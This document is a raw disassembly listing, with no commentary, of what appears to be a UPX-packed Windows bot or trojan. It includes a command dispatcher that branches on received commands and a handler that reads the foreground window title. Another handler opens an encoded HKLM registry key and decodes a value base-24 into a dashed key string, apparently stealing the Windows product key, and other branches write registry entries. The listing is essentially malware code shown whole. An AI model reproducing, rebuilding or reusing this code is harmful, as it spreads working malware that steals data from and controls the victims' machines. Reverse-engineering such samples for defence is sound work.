; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A86D proc near ; CODE XREF: sub_40A8AD+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov [ebp+var_4], 1
cmp [ebp+arg_4], 0
jnz short loc_40A884
push 1
pop eax
jmp short locret_40A8AB
; ---------------------------------------------------------------------------
loc_40A884: ; CODE XREF: sub_40A86D+10�j
mov [ebp+var_8], 1
jmp short loc_40A894
; ---------------------------------------------------------------------------
loc_40A88D: ; CODE XREF: sub_40A86D+39�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40A894: ; CODE XREF: sub_40A86D+1E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
loc_40A89A: ; DATA XREF: UPX1:0041AE78�o
; UPX1:0041AEBC�o ...
jg short loc_40A8A8
mov eax, [ebp+var_4]
imul eax, [ebp+arg_0]
mov [ebp+var_4], eax
jmp short loc_40A88D
; ---------------------------------------------------------------------------
loc_40A8A8: ; CODE XREF: sub_40A86D:loc_40A89A�j
mov eax, [ebp+var_4]
locret_40A8AB: ; CODE XREF: sub_40A86D+15�j
leave
retn
sub_40A86D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A8AD proc near ; CODE XREF: sub_406509+26�p
; sub_40A9CF+193F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_20], 0
mov esi, offset aAbcdef ; "abcdef"
lea edi, [ebp+var_1C]
movsd
movsw
movsb
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 30h
jnz short loc_40A90C
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 78h
jz short loc_40A905
mov eax, [ebp+arg_0]
add eax, [ebp+var_20]
movsx eax, byte ptr [eax]
cmp eax, 58h
jnz short loc_40A90C
loc_40A905: ; CODE XREF: sub_40A8AD+48�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_40A90C: ; CODE XREF: sub_40A8AD+33�j
; sub_40A8AD+56�j
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_28], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
jmp short loc_40A927
; ---------------------------------------------------------------------------
loc_40A920: ; CODE XREF: sub_40A8AD+116�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_40A927: ; CODE XREF: sub_40A8AD+71�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_28]
jge loc_40A9C8
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
movsx eax, byte ptr [eax]
push eax
call sub_416DE4 ; tolower
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 30h
jl short loc_40A95D
cmp [ebp+var_8], 39h
jg short loc_40A95D
mov eax, [ebp+var_8]
sub eax, 30h
mov [ebp+var_10], eax
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A95D: ; CODE XREF: sub_40A8AD+9D�j
; sub_40A8AD+A3�j
cmp [ebp+var_8], 61h
jl short loc_40A99C
cmp [ebp+var_8], 66h
jg short loc_40A99C
and [ebp+var_24], 0
jmp short loc_40A976
; ---------------------------------------------------------------------------
loc_40A96F: ; CODE XREF: sub_40A8AD:loc_40A998�j
mov eax, [ebp+var_24]
inc eax
mov [ebp+var_24], eax
loc_40A976: ; CODE XREF: sub_40A8AD+C0�j
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
test eax, eax
jz short loc_40A99A
mov eax, [ebp+var_24]
movsx eax, [ebp+eax+var_1C]
cmp [ebp+var_8], eax
jnz short loc_40A998
mov eax, [ebp+var_24]
add eax, 0Ah
mov [ebp+var_10], eax
loc_40A998: ; CODE XREF: sub_40A8AD+E0�j
jmp short loc_40A96F
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A8AD+D3�j
jmp short loc_40A9A0
; ---------------------------------------------------------------------------
loc_40A99C: ; CODE XREF: sub_40A8AD+B4�j
; sub_40A8AD+BA�j
xor eax, eax
jmp short loc_40A9CB
; ---------------------------------------------------------------------------
loc_40A9A0: ; CODE XREF: sub_40A8AD+AE�j
; sub_40A8AD:loc_40A99A�j
mov eax, [ebp+var_28]
sub eax, [ebp+var_14]
dec eax
push eax
push 10h
call sub_40A86D
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
imul eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, eax
mov [ebp+var_C], ecx
jmp loc_40A920
; ---------------------------------------------------------------------------
loc_40A9C8: ; CODE XREF: sub_40A8AD+80�j
mov eax, [ebp+var_C]
loc_40A9CB: ; CODE XREF: sub_40A8AD+F1�j
pop edi
pop esi
leave
retn
sub_40A8AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9CF proc near ; CODE XREF: sub_40D871+C95�p
; sub_40D871+D9C�p
var_6424 = dword ptr -6424h
var_6420 = dword ptr -6420h
var_641C = dword ptr -641Ch
var_6418 = dword ptr -6418h
var_6414 = dword ptr -6414h
var_6410 = dword ptr -6410h
var_640C = dword ptr -640Ch
var_6408 = dword ptr -6408h
var_6404 = dword ptr -6404h
var_6400 = dword ptr -6400h
var_63FC = dword ptr -63FCh
var_63F8 = dword ptr -63F8h
var_63F4 = dword ptr -63F4h
var_63F0 = dword ptr -63F0h
var_63EC = dword ptr -63ECh
var_63E8 = dword ptr -63E8h
var_63E4 = dword ptr -63E4h
var_63E0 = dword ptr -63E0h
var_63DC = dword ptr -63DCh
var_63D8 = dword ptr -63D8h
var_63D4 = dword ptr -63D4h
var_63D0 = dword ptr -63D0h
var_63CC = dword ptr -63CCh
var_63C8 = dword ptr -63C8h
var_63C4 = dword ptr -63C4h
var_63C0 = dword ptr -63C0h
var_63BC = dword ptr -63BCh
var_63B8 = dword ptr -63B8h
var_63B4 = word ptr -63B4h
var_63B2 = word ptr -63B2h
var_63B0 = dword ptr -63B0h
var_63A4 = dword ptr -63A4h
var_63A0 = byte ptr -63A0h
var_639C = dword ptr -639Ch
var_6398 = byte ptr -6398h
var_6397 = byte ptr -6397h
var_6396 = byte ptr -6396h
var_6395 = byte ptr -6395h
var_6394 = byte ptr -6394h
var_6393 = byte ptr -6393h
var_6392 = byte ptr -6392h
var_6391 = byte ptr -6391h
var_6390 = byte ptr -6390h
var_638F = byte ptr -638Fh
var_638E = byte ptr -638Eh
var_638D = byte ptr -638Dh
var_638C = dword ptr -638Ch
var_6388 = byte ptr -6388h
var_5F84 = dword ptr -5F84h
var_5F80 = byte ptr -5F80h
var_5B7C = dword ptr -5B7Ch
var_5B78 = dword ptr -5B78h
var_5B74 = byte ptr -5B74h
var_5A70 = dword ptr -5A70h
var_5A6C = dword ptr -5A6Ch
var_5A68 = dword ptr -5A68h
var_5A64 = byte ptr -5A64h
var_1A64 = dword ptr -1A64h
var_1A60 = byte ptr -1A60h
var_A60 = dword ptr -0A60h
var_A5C = byte ptr -0A5Ch
var_A38 = byte ptr -0A38h
var_A30 = dword ptr -0A30h
var_A2C = dword ptr -0A2Ch
var_A28 = dword ptr -0A28h
var_A24 = dword ptr -0A24h
var_A20 = dword ptr -0A20h
var_A1C = dword ptr -0A1Ch
var_A18 = byte ptr -0A18h
var_9F8 = dword ptr -9F8h
var_9F4 = byte ptr -9F4h
var_9EF = byte ptr -9EFh
var_9EA = byte ptr -9EAh
var_9E5 = byte ptr -9E5h
var_9E0 = byte ptr -9E0h
var_9DB = byte ptr -9DBh
var_9D8 = byte ptr -9D8h
var_9A4 = byte ptr -9A4h
var_970 = byte ptr -970h
var_8DC = dword ptr -8DCh
var_8D8 = byte ptr -8D8h
var_8D3 = byte ptr -8D3h
var_8D2 = byte ptr -8D2h
var_8CD = byte ptr -8CDh
var_8CC = byte ptr -8CCh
var_8C7 = byte ptr -8C7h
var_8C6 = byte ptr -8C6h
var_8C1 = byte ptr -8C1h
var_8C0 = byte ptr -8C0h
var_8BB = byte ptr -8BBh
var_8B8 = byte ptr -8B8h
var_8A0 = byte ptr -8A0h
var_720 = dword ptr -720h
var_71C = dword ptr -71Ch
var_718 = byte ptr -718h
var_59B = byte ptr -59Bh
var_598 = byte ptr -598h
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_214 = byte ptr -214h
var_1F0 = byte ptr -1F0h
var_1CC = byte ptr -1CCh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_183 = byte ptr -183h
var_83 = dword ptr -83h
var_7F = byte ptr -7Fh
var_19 = byte ptr -19h
var_B = byte ptr -0Bh
var_8 = byte ptr -8
var_5 = dword ptr -5
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, 6424h
call sub_416BC0
push esi
push edi
mov eax, [ebp+arg_14]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_1A8], eax
push [ebp+arg_0]
lea eax, [ebp+var_1A4]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push [ebp+arg_8]
lea eax, [ebp+var_183]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov eax, [ebp+arg_C]
mov [ebp+var_83], eax
push 7Ah
push [ebp+arg_10]
lea eax, [ebp+var_7F]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov [ebp+var_5], 1
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419F18
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AA59
lea eax, [ebp+var_1A4]
push eax
call sub_415AF0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AA59: ; CODE XREF: sub_40A9CF+76�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419F0C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AACF
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jnz short loc_40AAAC
lea eax, [ebp+var_214]
push eax
lea eax, [ebp+var_1F0]
push eax
lea eax, [ebp+var_1CC]
push eax
call sub_40668F
add esp, 0Ch
lea eax, [ebp+var_1CC]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AAAC: ; CODE XREF: sub_40A9CF+A6�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_40D7E5
pop ecx
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AACF: ; CODE XREF: sub_40A9CF+9D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419EF8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB21
push 200h
lea eax, [ebp+var_414]
push eax
call ds:dword_4171D8 ; GetForegroundWindow
push eax
call ds:dword_4171E4 ; GetWindowTextA
test eax, eax
jle short loc_40AB1C
lea eax, [ebp+var_414]
push eax
push offset dword_419EDC
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AB1C: ; CODE XREF: sub_40A9CF+130�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB21: ; CODE XREF: sub_40A9CF+113�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419ED0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40AB56
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4077DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AB56: ; CODE XREF: sub_40A9CF+165�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419EC4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AC89
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AC84
push 180h
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
lea eax, [ebp+var_598]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
cmp [ebp+var_418], 3
jle short loc_40ABFE
push offset dword_419EC0
mov eax, [ebp+var_418]
lea eax, [ebp+eax+var_59B]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40ABFE
mov eax, [ebp+var_418]
and [ebp+eax+var_59B], 0
lea eax, [ebp+var_598]
push eax
call sub_4078A0
pop ecx
lea eax, [ebp+var_598]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_418], eax
loc_40ABFE: ; CODE XREF: sub_40A9CF+1E1�j
; sub_40A9CF+1FF�j
mov eax, [ebp+var_418]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_418]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AC1F
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC1F: ; CODE XREF: sub_40A9CF+249�j
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF29
pop ecx
pop ecx
push [ebp+var_418]
lea eax, [ebp+var_598]
push eax
call sub_40EF59
pop ecx
pop ecx
mov [ebp+var_418], eax
push [ebp+var_418]
lea eax, [ebp+var_718]
push eax
lea eax, [ebp+var_598]
push eax
call sub_40EB4E
add esp, 0Ch
lea eax, [ebp+var_718]
push eax
push offset dword_419E9C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AC84: ; CODE XREF: sub_40A9CF+1A7�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AC89: ; CODE XREF: sub_40A9CF+19A�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E90
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40AD84
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
cmp eax, 3Dh
jnz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40EC96
pop ecx
test eax, eax
jz loc_40AD7F
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_71C], eax
mov eax, [ebp+var_71C]
cdq
push 4
pop ecx
idiv ecx
mov ecx, [ebp+var_71C]
sub ecx, eax
cmp ecx, 180h
jbe short loc_40AD0C
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD0C: ; CODE XREF: sub_40A9CF+336�j
lea eax, [ebp+var_8A0]
push eax
mov eax, [ebp+arg_18]
mov eax, [eax+4]
inc eax
push eax
call sub_40E9C9
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40F040
pop ecx
pop ecx
mov [ebp+var_720], eax
push [ebp+var_720]
lea eax, [ebp+var_8A0]
push eax
call sub_40EF41
pop ecx
pop ecx
mov eax, [ebp+var_720]
and [ebp+eax+var_8A0], 0
lea eax, [ebp+var_8A0]
push eax
push offset dword_419E70
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40AD7F: ; CODE XREF: sub_40A9CF+2DA�j
; sub_40A9CF+2EC�j ...
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AD84: ; CODE XREF: sub_40A9CF+2CD�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E60
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADB2
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406643
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADB2: ; CODE XREF: sub_40A9CF+3C8�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E50
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40ADD9
lea eax, [ebp+var_1A4]
push eax
call sub_4064BF
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40ADD9: ; CODE XREF: sub_40A9CF+3F6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419E48
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B0B6
and [ebp+var_9F8], 0
mov [ebp+var_A1C], 0C8h
push 0Ch
pop ecx
mov esi, offset aKnqQxjnuXxQEBZ ; "ߕ帚ɟËӋ"...
lea edi, [ebp+var_9D8]
rep movsd
movsb
push 5
pop ecx
mov esi, offset dword_419DFC
lea edi, [ebp+var_8B8]
rep movsd
movsb
lea eax, [ebp+var_9D8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_9F8]
push eax
push 20019h
push 0
lea eax, [ebp+var_9D8]
push eax
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jz short loc_40AE7D
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AE78
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AE78: ; CODE XREF: sub_40A9CF+49B�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AE7D: ; CODE XREF: sub_40A9CF+485�j
lea eax, [ebp+var_9D8]
push eax
call sub_4105AD
pop ecx
lea eax, [ebp+var_8B8]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_A1C]
push eax
lea eax, [ebp+var_9A4]
push eax
push 0
push 0
lea eax, [ebp+var_8B8]
push eax
push [ebp+var_9F8]
call ds:dword_41700C ; RegQueryValueExA
test eax, eax
jz short loc_40AEE7
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
cmp [ebp+var_9F8], 0
jz short loc_40AEE2
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
loc_40AEE2: ; CODE XREF: sub_40A9CF+505�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40AEE7: ; CODE XREF: sub_40A9CF+4EF�j
lea eax, [ebp+var_8B8]
push eax
call sub_4105AD
pop ecx
push [ebp+var_9F8]
call ds:dword_417028 ; RegCloseKey
push 7
pop ecx
mov esi, offset dword_419DDC
lea edi, [ebp+var_A18]
rep movsd
movsb
lea eax, [ebp+var_A18]
push eax
call sub_4105FB
pop ecx
and [ebp+var_9DB], 0
mov [ebp+var_8DC], 18h
jmp short loc_40AF3E
; ---------------------------------------------------------------------------
loc_40AF31: ; CODE XREF: sub_40A9CF+60B�j
mov eax, [ebp+var_8DC]
dec eax
mov [ebp+var_8DC], eax
loc_40AF3E: ; CODE XREF: sub_40A9CF+560�j
cmp [ebp+var_8DC], 0
jl loc_40AFDF
and [ebp+var_A20], 0
mov [ebp+var_A24], 0Eh
jmp short loc_40AF6B
; ---------------------------------------------------------------------------
loc_40AF5E: ; CODE XREF: sub_40A9CF+5EF�j
mov eax, [ebp+var_A24]
dec eax
mov [ebp+var_A24], eax
loc_40AF6B: ; CODE XREF: sub_40A9CF+58D�j
cmp [ebp+var_A24], 0
jl short loc_40AFC0
mov eax, [ebp+var_A20]
shl eax, 8
mov ecx, [ebp+var_A24]
movzx ecx, [ebp+ecx+var_970]
add eax, ecx
mov [ebp+var_A20], eax
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov ecx, [ebp+var_A24]
mov [ebp+ecx+var_970], al
mov eax, [ebp+var_A20]
cdq
push 18h
pop ecx
idiv ecx
mov [ebp+var_A20], edx
jmp short loc_40AF5E
; ---------------------------------------------------------------------------
loc_40AFC0: ; CODE XREF: sub_40A9CF+5A3�j
mov eax, [ebp+var_8DC]
mov ecx, [ebp+var_A20]
mov cl, [ebp+ecx+var_A18]
mov [ebp+eax+var_9F4], cl
jmp loc_40AF31
; ---------------------------------------------------------------------------
loc_40AFDF: ; CODE XREF: sub_40A9CF+576�j
lea eax, [ebp+var_A18]
push eax
call sub_4105AD
pop ecx
and [ebp+var_8BB], 0
mov [ebp+var_8C1], 2Dh
mov al, [ebp+var_8C1]
mov [ebp+var_8C7], al
mov al, [ebp+var_8C7]
mov [ebp+var_8CD], al
mov al, [ebp+var_8CD]
mov [ebp+var_8D3], al
push 5
lea eax, [ebp+var_9F4]
push eax
lea eax, [ebp+var_8D8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EF]
push eax
lea eax, [ebp+var_8D2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9EA]
push eax
lea eax, [ebp+var_8CC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E5]
push eax
lea eax, [ebp+var_8C6]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 5
lea eax, [ebp+var_9E0]
push eax
lea eax, [ebp+var_8C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_8D8]
push eax
push offset dword_418B64
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B0B6: ; CODE XREF: sub_40A9CF+41D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419DCC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B11C
mov [ebp+var_8], 1
movsx eax, [ebp+var_19]
test eax, eax
jz short loc_40B0E6
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0E6: ; CODE XREF: sub_40A9CF+706�j
movsx eax, [ebp+var_B]
test eax, eax
jz short loc_40B0FD
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
jmp short loc_40B117
; ---------------------------------------------------------------------------
loc_40B0FD: ; CODE XREF: sub_40A9CF+71D�j
lea eax, [ebp+var_1A4]
push eax
call sub_411D68
pop ecx
lea eax, [ebp+var_1A4]
push eax
call sub_4123F6
pop ecx
loc_40B117: ; CODE XREF: sub_40A9CF+715�j
; sub_40A9CF+72C�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B11C: ; CODE XREF: sub_40A9CF+6FA�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419DBC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B143
lea eax, [ebp+var_1A4]
push eax
call sub_414EB0
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B143: ; CODE XREF: sub_40A9CF+760�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419DB0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40B247
push 8
pop ecx
mov esi, offset dword_419D8C
lea edi, [ebp+var_A5C]
rep movsd
movsb
mov esi, offset dword_419D84
lea edi, [ebp+var_A38]
movsd
movsw
movsx eax, [ebp+var_A38]
mov ecx, ds:off_41DB18
movsx ecx, byte ptr [ecx]
sub eax, ecx
neg eax
sbb eax, eax
inc eax
mov [ebp+var_A30], eax
cmp [ebp+var_A30], 0
jz short loc_40B1AD
mov [ebp+var_63E4], offset dword_419D78
jmp short loc_40B1B7
; ---------------------------------------------------------------------------
loc_40B1AD: ; CODE XREF: sub_40A9CF+7D0�j
mov [ebp+var_63E4], offset dword_419D68
loc_40B1B7: ; CODE XREF: sub_40A9CF+7DC�j
mov eax, [ebp+var_63E4]
mov [ebp+var_A28], eax
cmp [ebp+var_A30], 0
jz short loc_40B1D8
mov [ebp+var_63E8], offset aThisBuildIsFul ; "This build is fully functional"
jmp short loc_40B1E2
; ---------------------------------------------------------------------------
loc_40B1D8: ; CODE XREF: sub_40A9CF+7FB�j
mov [ebp+var_63E8], offset aThisBuildIsBro ; "This build is broken and will not funct"...
loc_40B1E2: ; CODE XREF: sub_40A9CF+807�j
mov eax, [ebp+var_63E8]
mov [ebp+var_A2C], eax
lea eax, [ebp+var_A5C]
push eax
call sub_4105FB
pop ecx
push [ebp+var_A2C]
push [ebp+var_A28]
mov eax, ds:dword_41ED00
and eax, 0FFFFh
push eax
movsx eax, byte ptr ds:dword_41DAF8
and eax, 0FFh
push eax
lea eax, [ebp+var_A5C]
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 18h
lea eax, [ebp+var_A5C]
push eax
call sub_4105AD
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B247: ; CODE XREF: sub_40A9CF+787�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419D08
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B28E
mov eax, [ebp+arg_14]
push dword ptr [eax+14h]
mov eax, [ebp+arg_14]
push dword ptr [eax+10h]
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_405E45
add esp, 18h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B28E: ; CODE XREF: sub_40A9CF+88B�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CFC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B2C5
mov eax, [ebp+arg_18]
add eax, 4
push eax
mov eax, [ebp+arg_14]
add eax, 4
push eax
lea eax, [ebp+var_1A4]
push eax
call sub_4167DD
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B2C5: ; CODE XREF: sub_40A9CF+8D2�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CF0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40B2EF
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CE4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B300
loc_40B2EF: ; CODE XREF: sub_40A9CF+909�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_40D74D
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B300: ; CODE XREF: sub_40A9CF+91E�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CD4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B335
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_403260
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B335: ; CODE XREF: sub_40A9CF+944�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CC8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B36A
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_40260D
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B36A: ; CODE XREF: sub_40A9CF+979�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CB8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3A5
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_406509
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3A5: ; CODE XREF: sub_40A9CF+9AE�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419CA8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B3DA
mov eax, [ebp+arg_18]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_41665C
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3DA: ; CODE XREF: sub_40A9CF+9E9�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C98
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B426
mov eax, [ebp+arg_18]
cmp dword ptr [eax+4], 0
jnz short loc_40B3FD
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B3FD: ; CODE XREF: sub_40A9CF+A27�j
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000001h
call sub_401000
pop ecx
pop ecx
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
push 80000002h
call sub_401000
pop ecx
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B426: ; CODE XREF: sub_40A9CF+A1E�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C88
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B44C
mov eax, [ebp+arg_18]
push dword ptr [eax+4]
call sub_401146
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40B44C: ; CODE XREF: sub_40A9CF+A6A�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419C7C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40B47D
